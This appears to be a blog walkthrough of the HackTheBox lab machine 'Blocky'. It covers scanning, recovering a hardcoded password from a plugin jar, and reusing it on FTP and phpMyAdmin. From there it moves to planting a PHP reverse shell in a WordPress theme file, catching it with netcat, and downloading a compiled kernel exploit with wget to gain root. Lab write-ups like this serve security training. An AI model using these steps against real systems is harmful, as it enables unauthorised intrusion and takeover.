HackTheBox: Blocky

I began by performing an Nmap scan on the host:

# Nmap 7.80 scan initiated Sun Oct  4 04:21:03 2020 as: nmap -sV -sC -p- -O -oN scan
Nmap scan report for
Host is up (0.019s latency).
Not shown: 65530 filtered ports
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Device type: general purpose|specialized|WAP|storage-misc|printer
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (94%), Crestron 2-Series (89%), Asus embedded (89%), HP embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel cpe:/h:asus:rt-ac66u cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:3.4
Aggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 4.4 (94%), Linux 4.2 (93%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (91%), Linux 3.2 - 4.9 (91%), Linux 3.12 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct  4 04:23:03 2020 -- 1 IP address (1 host up) scanned in 120.29 seconds

From the output we can see that the machine is running ProFTP, OpenSSH, a WordPress site on Apache, a Minecraft server and a closed Sophos service. I tried to login to the FTP port as a guest, this however failed as guest logins were disabled. I next browsed to the wordpress site. you are greeted with this:

I ran DIRB against the web service to see if there were any interesting files:

DIRB v2.22    
By The Dark Raver

START_TIME: Sun Oct  4 07:11:13 2020
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: ----
+ (CODE:301|SIZE:0)                                                                                                                                                                                          
==> DIRECTORY:                                                                                                                                                                                             
==> DIRECTORY:                                                                                                                                                                                             
==> DIRECTORY:                                                                                                                                                                                                
+ (CODE:403|SIZE:299)                                                                                                                                                                                    
==> DIRECTORY:                                                                                                                                                                                                   
==> DIRECTORY:                                                                                                                                                                                               
==> DIRECTORY:                                                                                                                                                                                             
==> DIRECTORY:                                                                                                                                                                                            
+ (CODE:405|SIZE:42)

From this DIRB output you can see that there is a directory called plugins. I browsed to this directory:

There are two files available to download. I downloaded both these files and extracted the contents with the “jar -xf” command.

Inside BlockyCore.jar there is a file called BlockyCore.class. I ran strings against this file:

root@kali:/home/kali/Documents/blocky/blockycore/com/myfirstplugin# strings BlockyCore.class 
TODO get username
!Welcome to the BlockyCraft!!!!!!!

As you can see from the output, there is one interesting result, the string “8YsqfCTnvxAUeduzjNSXe22”.

There are multiple locations this potential password could be used. (FTP, wordpress login, SSH). After some trial and error i discovered that this password allows you to login to both the phpMyAdmin and the FTP server. I started with the FTP server as this was the easiest. I noticed on the wordpress blog the username of the user making the posts was notch. Attempting to connect to the FTP server using this username and the 8YsqfCTnvxAUeduzjNSXe22 password was successful. This also allows access to download and read the user flag:

root@kali:/home/kali/Downloads# ftp
Connected to
220 ProFTPD 1.3.5a Server (Debian) [::ffff:]
Name ( notch
331 Password required for notch
230 User notch logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   7 notch    notch        4096 Jul  3  2017 minecraft
-r--------   1 notch    notch          32 Jul  3  2017 user.txt
226 Transfer complete
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful
150 Opening BINARY mode data connection for user.txt (32 bytes)
226 Transfer complete
32 bytes received in 0.00 secs (34.7608 kB/s)
ftp> exit
221 Goodbye.
root@kali:/home/kali/Downloads# cat user.txt

I then moved onto phpMyAdmin found during the DIRB scan.

It was possible to login to this also using the same password found before. with the username of root.

Now I had access to phpMyAdmin. I added a WordPress administrator to login to the WordPress administration panel. I expanded the wp_users table and made a copy of the current administrator user (Notch). I then edited the copy changing the username and password to something I know.

Once saved, I was able to successfully browse to and login with the username Bob and password of Password5050.

The next stage was to get some kind of reverse shell on the machine so I could interact with it. I did this by opening the Appearance editor, and modifying the archive.php file with the PHP reverse shell found HERE. Once the archive.php file was updated. I started my netcat listener on the port I specified in the reverse shell. I then browsed to to execute the shell:

root@kali:/home/kali/Documents/blocky# nc -nvlp 2600
listening on [any] 2600 ...
connect to [] from (UNKNOWN) [] 53038
Linux Blocky 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 06:05:16 up  4:51,  0 users,  load average: 0.12, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami

As you can see from the output it worked successfully. I had access to the machine as the www-data user. The next step was to escalate privileges. I did this using a kernel exploit. I identified the kernel using the command “uname-a”:

$ uname -a
Linux Blocky 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

I then googled for exploits for this specific kernel. I found THIS exploit which could be used. I downloaded the C code and compiled it:

root@kali:/home/kali/Downloads# gcc 45010.c -o kb

I then hosted the compiled file via HTTP on the local machine, and downloaded it using wget onto the blocky machine:

$ wget
--2020-10-04 08:06:34--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 22280 (22K) [application/octet-stream]
Saving to: 'kb'

     0K .......... .......... .                               100% 1.09M=0.02s

2020-10-04 08:06:34 (1.09 MB/s) - 'kb' saved [22280/22280]

$ chmod +x kb

Once the exploit had transferred. I ran it and a root shell was generated. I was then able to browse to /root/root.txt to get the root flag.

$ ./kb

cd /root
cat root.txt






Leave a Reply

Your email address will not be published. Required fields are marked *